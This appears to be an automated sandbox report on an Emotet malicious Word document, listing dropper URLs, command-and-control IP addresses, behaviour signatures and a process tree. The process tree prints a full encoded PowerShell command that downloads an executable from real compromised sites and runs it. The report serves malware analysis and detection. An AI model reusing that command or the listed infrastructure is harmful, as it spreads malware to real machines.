Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    18-12-2019 04:20

General

  • Target

    9d7854178437a26f14d851e786d68dcdfa005d2010b175103ccf8e1eb106b141

  • Sample

    191218-xngrmz4lzs

  • SHA256

    9d7854178437a26f14d851e786d68dcdfa005d2010b175103ccf8e1eb106b141

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://duanchungcubatdongsan.com/wp-admin/kvv6737/

exe.dropper

http://iamsuperkol.com/wp-admin/1gexz6/

exe.dropper

http://demo1.alismartdropship.com/wp-content/cs9ei61/

exe.dropper

http://driventodaypodcast.com/megaphone/t45787/

exe.dropper

http://newdiscoverclutch.discoverclutch.com/cgi-bin/4v6/

Extracted

Family

emotet

C2

74.79.103.55:80

190.100.153.162:443

190.6.193.152:8080

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

80.85.87.122:8080

62.75.160.178:8080

71.76.45.83:443

14.160.93.230:80

87.106.77.40:7080

149.135.123.65:80

76.221.133.146:80

46.101.212.195:8080

91.83.93.124:7080

45.8.136.201:80

201.213.32.59:80

2.139.158.136:443

152.170.108.99:443

188.14.39.65:443

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9d7854178437a26f14d851e786d68dcdfa005d2010b175103ccf8e1eb106b141.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4932
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABRAHkAagB1AHcAaABwAG4AdgBvAHMAdwBzAD0AJwBQAGEAcQB5AGkAagBzAHEAZwBtAGMAZwB1ACcAOwAkAEEAYQBoAHYAZgBlAHkAdgBmAHYAeQB3ACAAPQAgACcAMQAwADcAJwA7ACQARQBmAGgAYQBnAG8AdgBxAGEAZQBuAGYAcwA9ACcATQBzAHcAcQB2AGkAeQBrAG8AeQAnADsAJABIAHcAeABiAHgAZQByAGYAeABwAG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAYQBoAHYAZgBlAHkAdgBmAHYAeQB3ACsAJwAuAGUAeABlACcAOwAkAEgAdABhAHYAawB1AHAAbwA9ACcARgBzAGEAZQB6AHkAZQB2AG4AeAAnADsAJABWAHIAcwBwAGEAYgB3AHkAcwBsAGMAYwB1AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAVAAuAHcARQBCAGMATABpAGUAbgB0ADsAJABXAGsAbQBlAG0AZgB1AHIAbAB0AD0AJwBoAHQAdABwADoALwAvAGQAdQBhAG4AYwBoAHUAbgBnAGMAdQBiAGEAdABkAG8AbgBnAHMAYQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBrAHYAdgA2ADcAMwA3AC8AKgBoAHQAdABwADoALwAvAGkAYQBtAHMAdQBwAGUAcgBrAG8AbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMQBnAGUAeAB6ADYALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAxAC4AYQBsAGkAcwBtAGEAcgB0AGQAcgBvAHAAcwBoAGkAcAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGMAcwA5AGUAaQA2ADEALwAqAGgAdAB0AHAAOgAvAC8AZAByAGkAdgBlAG4AdABvAGQAYQB5AHAAbwBkAGMAYQBzAHQALgBjAG8AbQAvAG0AZQBnAGEAcABoAG8AbgBlAC8AdAA0ADUANwA4ADcALwAqAGgAdAB0AHAAOgAvAC8AbgBlAHcAZABpAHMAYwBvAHYAZQByAGMAbAB1AHQAYwBoAC4AZABpAHMAYwBvAHYAZQByAGMAbAB1AHQAYwBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANAB2ADYALwAnAC4AIgBzAHAAYABMAGkAVAAiACgAJwAqACcAKQA7ACQAUQBvAHgAbQBlAHEAZgB1AD0AJwBYAGwAbgB3AHoAaQBkAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFgAZABtAHAAZABmAGMAagBzAHgAYgBzAGgAIABpAG4AIAAkAFcAawBtAGUAbQBmAHUAcgBsAHQAKQB7AHQAcgB5AHsAJABWAHIAcwBwAGEAYgB3AHkAcwBsAGMAYwB1AC4AIgBEAE8AdwBgAE4AbABvAGEARABgAEYASQBMAGUAIgAoACQAWABkAG0AcABkAGYAYwBqAHMAeABiAHMAaAAsACAAJABIAHcAeABiAHgAZQByAGYAeABwAG4AKQA7ACQAUgBhAG4AZABwAHIAaQBhAGcAcwBrAD0AJwBFAGQAbQB4AHgAcAB6AGkAeABzAGMAdQBvACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQASAB3AHgAYgB4AGUAcgBmAHgAcABuACkALgAiAEwAYABFAGAATgBnAHQASAAiACAALQBnAGUAIAAzADIANgA3ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQASAB3AHgAYgB4AGUAcgBmAHgAcABuACkAOwAkAFYAcwBjAHYAcABsAHEAYgB0AHcAbgBpAGUAPQAnAFIAbQBuAGoAdABuAGsAZgAnADsAYgByAGUAYQBrADsAJABGAHUAaABrAGkAYgBhAGYAPQAnAEEAaQBwAGoAdABuAGwAZQBiAGMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBzAGwAaQBiAGgAagBsAD0AJwBJAHMAagByAGkAcQBrAHYAbQBjACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:3020
    • C:\Users\Admin\107.exe
      "C:\Users\Admin\107.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4372
      • C:\Users\Admin\107.exe
        --ca07d716
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4348

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4348-11-0x0000000000750000-0x0000000000767000-memory.dmp

    Filesize

    92KB

  • memory/4348-12-0x0000000000400000-0x0000000000454000-memory.dmp

    Filesize

    336KB

  • memory/4372-9-0x0000000002190000-0x00000000021A7000-memory.dmp

    Filesize

    92KB

  • memory/4932-2-0x00000213FA4A7000-0x00000213FA4AA000-memory.dmp

    Filesize

    12KB

  • memory/4932-4-0x00000213FE7A8000-0x00000213FE7AD000-memory.dmp

    Filesize

    20KB

  • memory/4932-5-0x00000213FE7A8000-0x00000213FE7AD000-memory.dmp

    Filesize

    20KB

  • memory/4932-6-0x00000213FE7A3000-0x00000213FE7A8000-memory.dmp

    Filesize

    20KB